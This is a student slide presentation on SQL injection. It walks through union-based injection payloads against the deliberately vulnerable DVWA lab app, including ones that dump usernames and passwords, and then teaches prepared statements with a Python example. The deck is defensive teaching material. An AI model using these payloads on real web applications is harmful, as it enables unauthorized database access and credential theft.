SQL Injection By Wenonah Abadilla. Topics What is SQL What is SQL Injection Damn Vulnerable Web App SQLI Demo Prepared Statements.

SQL Injection By Wenonah Abadilla

Topics
What is SQL
What is SQL Injection
Damn Vulnerable Web App SQLI Demo
Prepared Statements

What is SQL?
Structured Query Language
The way you communicate with the database
Used to access and manipulate databases
COSC 341 at IUP

What is SQL Injection?
One of the most serious threats to web applications
Injects SQL commands into an SQL statement via web page input
Alters an SQL statement and compromises the security of a web application
Common with PHP and ASP applications due to the prevalence of older functional interfaces
Occurs when data enters a program from an untrusted source and that data is used to dynamically construct a SQL query
SQL injection: crafted SQL statements used to harvest sensitive data

Types of SQLI
Error Based: causes an error and gathers information from the error message
Union Based: combines the results of two or more SQL statements into one result set
Blind: asks the database a true-or-false question and infers the answer from the response

Consequences of SQL Injection
Confidentiality
Authentication
Authorization
Integrity

Damn Vulnerable Web App Demo
PHP/MySQL web application
Aid for security professionals: test skills and tools in a legal environment
Helps developers better understand the process of securing web applications

$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";

Basic Injection
The web page is supposed to print ID, first name and surname
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '1'";

Always True Scenario
Asks the database to display all records that are false and all records that are true
'%' – probably not equal to anything, so it is false
'0'='0' – always true, because 0 always equals 0
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '%' or '0'='0'";

Display Database Version
Notice the last displayed line: this is the version of the MySQL database
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '%' or 0=0 union select null, version() # ";

Display Database User
Notice the last displayed line: the name of the database account the behind-the-scenes PHP code connected as
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '%' or 0=0 union select null, user() # ";

Display Database Name
Notice the last displayed line: this is the name of the database
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '%' or 0=0 union select null, database() # ";

Display All Tables in the information_schema
Displays all the tables in the information_schema database
INFORMATION_SCHEMA is the informational database: it stores information about all other databases that the MySQL server maintains
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '%' or 0=0 union select null, table_name from information_schema.tables #";

Display All User Tables in the information_schema
Quicker than looking through the previous output and manually searching for the user table
Displays all tables whose names start with the prefix "user" in the information_schema database
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '%' or 0=0 union select null, table_name from information_schema.tables where table_name like 'user%' #";

Display All Column Fields in the users Table
Displays all the columns in the users table
Notice the user_id, first_name, last_name, user and password columns
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '%' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' #";

Display Column Field Contents in the users Table
Successfully displays all the authentication information stored in the database
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '%' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #";

Prepared Statements and Bound Parameters
The query and the data are sent to the SQL server separately
Also called parameterized statements or parameterized SQL
A prepared statement is a template for an SQL statement; values are plugged into the query after it is "prepared" and ready to be executed
Bound parameters: placeholders (?) where the actual values are plugged in

Examples
Java using JDBC: the statement sets "?" to the actual value stored in the id variable
PHP using PDO
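The contrast between the demo's string-built $getid query and the prepared statements just described, as an added example that is not from the slides or from DVWA. It uses Python's standard sqlite3 module in place of PHP/MySQL (the binding mechanism is the same idea as JDBC's "?" and PDO placeholders), and the users rows are constructed sample data modelled on the columns the slides name.

```python
import sqlite3

# Constructed sample rows modelled on the DVWA users table named in the slides
# (user_id, first_name, last_name, user). Not real DVWA data.
SAMPLE_USERS = [
    (1, "admin", "admin", "admin"),
    (2, "Gordon", "Brown", "gordonb"),
    (3, "Hack", "Me", "1337"),
]

# The same "always true" input the slides use against the $getid query.
ALWAYS_TRUE_INPUT = "%' or '0'='0"


def make_db():
    """In-memory SQLite database standing in for the MySQL backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER PRIMARY KEY, "
        "first_name TEXT, last_name TEXT, user TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn, user_input):
    """Mirrors the slide's $getid string: the input is spliced into the SQL text,
    so quotes in the input change the structure of the statement."""
    query = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_input}'"
    return conn.execute(query).fetchall()


def lookup_prepared(conn, user_input):
    """Prepared statement: the SQL template with a ? placeholder is fixed, and the
    driver sends the value separately, so it can only ever be compared as data."""
    query = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(query, (user_input,)).fetchall()


def demo():
    """Run both lookups with a normal id and with the always-true input."""
    conn = make_db()
    return {
        "vuln_normal": lookup_vulnerable(conn, "1"),
        "vuln_always_true": lookup_vulnerable(conn, ALWAYS_TRUE_INPUT),
        "prep_normal": lookup_prepared(conn, "1"),
        "prep_always_true": lookup_prepared(conn, ALWAYS_TRUE_INPUT),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {rows}")
```

With id "1" both functions return the single admin row. With the always-true input the concatenated query becomes `WHERE user_id = '%' or '0'='0'` and returns every row, exactly as the slide shows; the prepared statement compares the whole string as a value against user_id and returns nothing.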

Conclusion
SQLI is a huge threat to web applications
Use prepared SQL statements
Download Damn Vulnerable Web App
Questions?

Reference Page
"Coding Dynamic SQL Statements." Oracle Docs. Oracle, n.d. Web. 18 Feb
"(Damn Vulnerable Web App (DVWA): Lesson 6)." Computer Security Student. N.p., n.d. Web. 17 Feb
"PHP Prepared Statements." W3schools. N.p., n.d. Web. 18 Feb
"SQL Injection." OWASP. N.p., 14 Aug. Web. 19 Feb
"SQL Injection." W3schools. N.p., n.d. Web. 15 Feb